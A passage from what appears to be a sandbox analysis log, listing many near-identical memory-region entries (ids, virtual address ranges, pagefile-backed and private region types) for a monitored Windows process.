0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 5999 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6588 start_va = 0x1b0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 6589 start_va = 0x1b0000 end_va = 0x1d1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 6590 start_va = 0x1e0000 end_va = 0x1e6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 6591 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6592 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6593 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6594 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6595 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6596 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6597 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6598 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6599 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6600 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6601 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6602 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6603 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6612 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6613 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6614 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6615 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6616 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6617 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6618 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6619 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6620 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6621 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6622 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6623 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6624 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6625 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6626 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6627 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6628 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6629 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6630 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6631 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6632 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6633 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6634 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6635 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6636 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6637 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6638 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6639 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6640 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6641 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6642 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6643 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6644 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6645 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6646 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6647 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6648 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6649 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6650 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6670 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6671 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6672 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6673 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6674 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6675 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6676 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6677 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6678 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6679 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6680 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6681 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6682 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6683 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6684 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6685 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6686 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6687 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6688 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6689 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6690 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6691 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6692 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6693 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6694 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6695 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6696 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6697 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6698 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6699 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6700 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6701 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6702 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6703 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6704 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6705 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6706 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6707 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6708 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6709 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6710 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6711 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6712 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6713 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6714 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6715 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6716 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6773 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6774 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6775 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6776 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6777 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6778 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6779 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6780 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6781 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6782 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6783 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6784 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6785 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6786 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6787 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6788 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6789 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6790 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6791 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6792 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6793 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6794 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6795 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6796 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6797 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6798 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6799 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6800 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6801 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6802 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6803 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6804 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6805 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6806 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6807 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6808 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6809 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6810 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6811 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6812 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6813 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6814 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6815 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6816 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6817 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6818 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6819 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6820 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6821 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6822 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6823 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6824 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6825 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6826 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6827 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6828 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6887 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6888 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6889 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6890 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6891 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6892 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6893 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6894 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6895 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6896 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6897 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6898 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6899 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6900 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6901 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6902 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6903 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6904 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6905 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6906 